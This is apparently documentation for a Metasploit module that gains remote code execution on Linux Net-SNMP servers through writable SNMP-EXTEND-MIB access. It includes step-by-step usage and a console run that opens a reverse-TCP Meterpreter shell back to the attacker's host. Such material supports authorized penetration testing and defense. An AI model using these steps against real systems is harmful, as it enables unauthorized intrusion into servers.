h00die
4.7 KiB
Vulnerable Application
This module uses SNMP extension MIBs to enable remote code execution on the Linux Net-SNMPD servers using the SNMP-EXTEND-MIB.
Verification Steps
- Start
msfconsole - Do:
use exploit/linux/snmp/net_snmpd_rw_access - Do:
set rhost [IP] - Do:
set community [SNMP Community] - Do:
set version [SNMP Version] - Configure the payload
- Do:
run - You should get a session
Options
FILEPATH
The location to write the executable out to on the target. Needs to be writable by the SNMP service user. This defaults to /tmp.
COMMUNITY
The read/write community string of the target Net-SNMP service.
VERSION
The SNMP protocol version. Accepted values are '1' or '2c'.
CHUNKSIZE
The maximum amount of payload bytes to write in a single operation. This value was found through experimentation and may not be suitable in all environments, but should hopefully work for all cmdstager flavors
Note that cmdstager payloads are modified to allow further escaping, so the values limits may also change between cmdstager flavors.
This is possibly related to the following bug: [https://sourceforge.net/p/net-snmp/bugs/2542/].
TIMEOUT
Specifies the maximum time to allow SNMP to timeout.
SHELL
The shell to call for the client. Defaults to '/bin/bash'
Scenarios
msf > use exploit/linux/snmp/net_snmpd_rw_access
msf exploit(linux/snmp/net_snmpd_rw_access) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(linux/snmp/net_snmpd_rw_access) > set rhost 192.168.1.3
rhost => 192.168.1.3
msf exploit(linux/snmp/net_snmpd_rw_access) > set lhost 192.168.1.2
lhost => 192.168.1.2
msf exploit(linux/snmp/net_snmpd_rw_access) > set community private
community => private
msf exploit(linux/snmp/net_snmpd_rw_access) > set version 2c
version => 2c
msf exploit(linux/snmp/net_snmpd_rw_access) > show info
Name: Net-SNMPd Write Access SNMP-EXTEND-MIB arbitrary code execution
Module: exploit/linux/snmp/net_snmpd_rw_access
Platform:
Arch:
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Steve Embling at InteliSecure
Available targets:
Id Name
-- ----
0 Linux x86
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CHUNKSIZE 200 yes Maximum bytes of payload to write at once
COMMUNITY private yes SNMP Community String
FILEPATH /tmp yes file path to write to
RETRIES 1 yes SNMP Retries
RHOST 192.168.1.3 yes The target address
RPORT 161 yes The target port (TCP)
SHELL /bin/bash yes Shell to call with -c argument
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TIMEOUT 1 yes SNMP Timeout
URIPATH no The URI to use for this exploit (default is random)
VERSION 2c yes SNMP Version <1/2c>
Payload information:
Space: 4096
Description:
This exploit module exploits the SNMP write access configuration
ability of SNMP-EXTEND-MIB to configure MIB extensions and lead to
remote code execution.
References:
https://www.intelisecure.com
msf exploit(linux/snmp/net_snmpd_rw_access) > run
[*] Started reverse TCP handler on 192.168.1.2:4444
[*] Command Stager progress - 1.11% done (199/17924 bytes)
[*] Command Stager progress - 2.23% done (399/17924 bytes)
[*] Command Stager progress - 3.34% done (598/17924 bytes)
[*] Command Stager progress - 4.45% done (797/17924 bytes)
... Redacted ...
[*] Command Stager progress - 98.64% done (17681/17924 bytes)
[*] Command Stager progress - 99.72% done (17873/17924 bytes)
[*] Sending stage (857352 bytes) to 192.168.1.3
[*] Meterpreter session 31 opened (192.168.1.2:4444 -> 192.168.1.3:54232) at 2018-02-14 17:30:22 +0000
[+] SNMP request timeout (this is promising).
[*] Command Stager progress - 100.00% done (18022/18022 bytes)
meterpreter > getuid
Server username: uid=121, gid=129, euid=121, egid=129
meterpreter > exit
[*] 192.168.1.3 - Meterpreter session 30 closed. Reason: User exit